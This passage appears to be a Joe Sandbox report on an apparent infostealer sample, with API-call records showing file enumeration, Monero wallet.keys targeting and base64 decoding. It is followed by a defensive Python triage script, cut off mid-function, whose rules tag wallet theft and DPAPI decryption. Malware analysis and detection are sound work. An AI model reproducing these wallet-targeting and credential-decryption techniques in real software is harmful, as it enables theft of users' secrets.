                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,003005AF), ref: 002F7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002F7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 002F7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002F7C62
                  • LocalFree.KERNEL32(00000000), ref: 002F7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,e?$T{{$W}T{$\);Y$f1[?$xA-$zw
                  • API String ID: 0-3163517618
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00300D73), ref: 002EE4A2
                  • StrCmpCA.SHLWAPI(?,003014F8), ref: 002EE4F2
                  • StrCmpCA.SHLWAPI(?,003014FC), ref: 002EE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 94931322381c07e0a0c697c2a429957a834b7fa264b9de774c5c88b8fe07be82
                  • Instruction ID: 8a1f52c6fb8a46730cb133859b950a3bbe5f01db43e3c745b38f634d910a0bb6
                  • Opcode Fuzzy Hash: 94931322381c07e0a0c697c2a429957a834b7fa264b9de774c5c88b8fe07be82
                  • Instruction Fuzzy Hash: CE1231B192011C9ADB15FB60DC96EFDB338AF54780F4041B8B60E96095EE706F69CF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )[Tn$0wx$F0_~$w;K$8{y$mO
                  • API String ID: 0-1004035091
                  • Opcode ID: aaefebd9b1545668d6d61da3c5d9256461f2846d6febf4bf09a92b7b8b15a86b
                  • Instruction ID: b25c40e62d445ddfd62c657b2f56c99edb65ba809999aa4de0616ddd7ef14d77
                  • Opcode Fuzzy Hash: aaefebd9b1545668d6d61da3c5d9256461f2846d6febf4bf09a92b7b8b15a86b
                  • Instruction Fuzzy Hash: E4B2E7F3A08204AFE314AE2DEC8577ABBE5EF94720F1A493DE6C4C3744E63558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #E:}$+_-($WQsX$m5}{$wMi$I#9
                  • API String ID: 0-836572290
                  • Opcode ID: 32b71fa010174552883d43e8ed6beeab45eff3224e7a1008c4620b28ff4dbf53
                  • Instruction ID: 23f87acc7af7e226a218509567415d25c8d86844931873970e56dded1612107f
                  • Opcode Fuzzy Hash: 32b71fa010174552883d43e8ed6beeab45eff3224e7a1008c4620b28ff4dbf53
                  • Instruction Fuzzy Hash: D5A2D1F290C2009FE714AF29EC8567ABBE5EF94320F1A493DEAC4C3340E63558558797
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9B2A
                  • LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID: N.
                  • API String ID: 4291131564-1444805592
                  • Opcode ID: 048df4069512b678bd5b6636b84fb2608b787a0e6d92bcad2e4f38bb74888d4d
                  • Instruction ID: 26203c953a00010e4622e9a6acb2ac9753eb0cc534138c40a83bafef26f257ad
                  • Opcode Fuzzy Hash: 048df4069512b678bd5b6636b84fb2608b787a0e6d92bcad2e4f38bb74888d4d
                  • Instruction Fuzzy Hash: E311A2B4240208BFEB14CF64DC95FAA77B5FB8A704F208059FA159B390D7B6A941DB90
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 3e}}$E`$I`}<$JBY$pr{{
                  • API String ID: 0-997465392
                  • Opcode ID: 7cf6599a59e889b7de2ea2791afb0a3d5de196288b5346b5a91cc2acb638082b
                  • Instruction ID: e1674a0eccf158fa95c7c00aed3ed555a65662c4e3e60a20433e97187d61423a
                  • Opcode Fuzzy Hash: 7cf6599a59e889b7de2ea2791afb0a3d5de196288b5346b5a91cc2acb638082b
                  • Instruction Fuzzy Hash: 70B238F360C2049FE704AE2DEC8577ABBE5EF94320F198A3DE6C5C7744E63598018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *So{$+{f$FO$I5o$tXy
                  • API String ID: 0-313380642
                  • Opcode ID: 5a09d47ceaf5478f1cade4340a73dda3ad300aa49755e74198095dd039d403d8
                  • Instruction ID: d246448ec3baf0e72bcfa381dd9ebc04d69c0e5911ffd093db1a858f4031c8e3
                  • Opcode Fuzzy Hash: 5a09d47ceaf5478f1cade4340a73dda3ad300aa49755e74198095dd039d403d8
                  • Instruction Fuzzy Hash: 1EB217F360C204AFE3046E29EC8567ABBEAEFD4720F1A453DE6C483744EA7558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (Bv?$OiUw$A:7$o$$~
                  • API String ID: 0-2293706008
                  • Opcode ID: 0850d68a01be43dabd410b73aef7460a4adc9dcbf28551dbfdd25dc25d6b4f14
                  • Instruction ID: fcb7d4f0fd74cc5e2d7da9ce145e9b03b2e2de8da50e543ffec457fbbe0e2694
                  • Opcode Fuzzy Hash: 0850d68a01be43dabd410b73aef7460a4adc9dcbf28551dbfdd25dc25d6b4f14
                  • Instruction Fuzzy Hash: F4B21AF3A0C2049FE3046E2DEC8567ABBE9EF94320F1A863DEAC4C7744E53558158697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: XnT$Xdm$c_d?$h0&o$pg
                  • API String ID: 0-963659292
                  • Opcode ID: fadefa855ec8968bafb18ef0ebf40fe9877e8311bbb6e82632d921141ae888bc
                  • Instruction ID: 9e528cafdc817cc17c0c03181f2f8b2e17a5dee8d6fa0e086b771d269b51d7ec
                  • Opcode Fuzzy Hash: fadefa855ec8968bafb18ef0ebf40fe9877e8311bbb6e82632d921141ae888bc
                  • Instruction Fuzzy Hash: 1EB2F5F36082049FE314AE2DEC85A7AFBE9EF94720F16493DE6C4C3744EA3558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &~?7$>i/$\~o$x]Z{$y]Z{
                  • API String ID: 0-1267071312
                  • Opcode ID: 5a29bb2a63f9b81d89a5ddefaa4824a7d8922d4f1ba33911baeb0c18a51f21d9
                  • Instruction ID: 229b0758463582afc3bab29713c28c4202b84d36fc268d6df36cb1492c15985d
                  • Opcode Fuzzy Hash: 5a29bb2a63f9b81d89a5ddefaa4824a7d8922d4f1ba33911baeb0c18a51f21d9
                  • Instruction Fuzzy Hash: ABB2D4F360C6049FE304AE2DEC8567AFBE6EF94320F1A493DE6C483744EA3558058697
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002EC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002EC87C
                  • lstrcat.KERNEL32(?,00300B46), ref: 002EC943
                  • lstrcat.KERNEL32(?,00300B47), ref: 002EC957
                  • lstrcat.KERNEL32(?,00300B4E), ref: 002EC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 281b3e26d7c92e712145e4c0e933becfc34c34034037b596f6a95ad0bf3bffab
                  • Instruction ID: 4c6952f225b06515158b145d98cec82d3de0042bf332d9e57c63bab487ff365e
                  • Opcode Fuzzy Hash: 281b3e26d7c92e712145e4c0e933becfc34c34034037b596f6a95ad0bf3bffab
                  • Instruction Fuzzy Hash: 2B417EB5D1420ADBCB20DFA0DC89BFEB7B8BF48304F1041A8E509A6280D7709A85DF91
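The API sequences in the records above are what an analyst actually extracts from a report like this: a FindFirstFileA/FindNextFileA loop over `\*.*` with a `\Monero\wallet.keys` path built in a subcall, and CryptStringToBinaryA called with dwFlags 0x1 (CRYPT_STRING_BASE64), first to size the buffer and then to decode into it, with a CryptUnprotectData record following further down. The script below is an added example by the editor, not part of the Joe Sandbox report or of the sample: it parses lines in the report's own `Name.MODULE(args), ref: ADDR` format (the sample input is a constructed copy of lines from this section) and maps each function record to a behaviour tag. The tag names and rules are the editor's own, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox function records: maps the API call lines
of each record to behaviour tags. Added example; the tags and rules are the
editor's own and are not Joe Sandbox signatures."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample input: API lines copied from the function records in this
# section of the report, separated by the report's own "APIs" header line.
SAMPLE_REPORT = r"""
APIs
  • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00300D73), ref: 002EE4A2
  • StrCmpCA.SHLWAPI(?,003014F8), ref: 002EE4F2
  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EEBDF
APIs
  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
  • LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
  • LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
APIs
  • GetSystemTime.KERNEL32(?), ref: 002F696C
  • sscanf.NTDLL ref: 002F6999
  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002F69B2
  • ExitProcess.KERNEL32 ref: 002F69DA
APIs
  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002E724D
  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002E7281
  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002E72A4
"""

# One call as the report prints it: Name.MODULE(args), ref: ADDRESS
CALL_RE = re.compile(
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

CRYPT_STRING_BASE64 = 0x1  # documented dwFlags value for CryptStringToBinaryA


@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: str
    inlined: bool  # True for "Part of subcall function ..." lines


def parse_calls(block: str) -> List[Call]:
    calls = []
    for line in block.splitlines():
        m = CALL_RE.search(line)
        if m:
            args = m.group("args")
            calls.append(Call(m.group("name"), m.group("module"),
                              args.split(",") if args else [], m.group("ref"),
                              "Part of subcall" in line))
    return calls


def split_functions(report: str) -> Dict[str, List[Call]]:
    """Split on the report's 'APIs' header; key each record by the ref of its
    first call that belongs to the function itself rather than to a subcall."""
    functions: Dict[str, List[Call]] = {}
    for block in re.split(r"^\s*APIs\s*$", report, flags=re.M):
        calls = parse_calls(block)
        if calls:
            key = next((c.ref for c in calls if not c.inlined), calls[0].ref)
            functions[key] = calls
    return functions


def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None  # "?" marks an argument the sandbox could not resolve


def classify(calls: List[Call]) -> Set[str]:
    names = {c.name for c in calls}
    all_args = [a for c in calls for a in c.args]
    tags: Set[str] = set()
    if {"FindFirstFileA", "FindNextFileA"} <= names:
        tags.add("directory-enumeration")
    if any("wallet" in a.lower() for a in all_args):
        tags.add("crypto-wallet-file-targeting")
    # Third parameter of CryptStringToBinaryA is dwFlags; 0x1 selects base64
    if any(c.name == "CryptStringToBinaryA" and len(c.args) > 2
           and _hex(c.args[2]) == CRYPT_STRING_BASE64 for c in calls):
        tags.add("base64-decode")
    if "CryptUnprotectData" in names:
        tags.add("dpapi-decrypt")
    if {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"} <= names:
        tags.add("time-bomb-check")
    return tags


def triage(report: str) -> Dict[str, Set[str]]:
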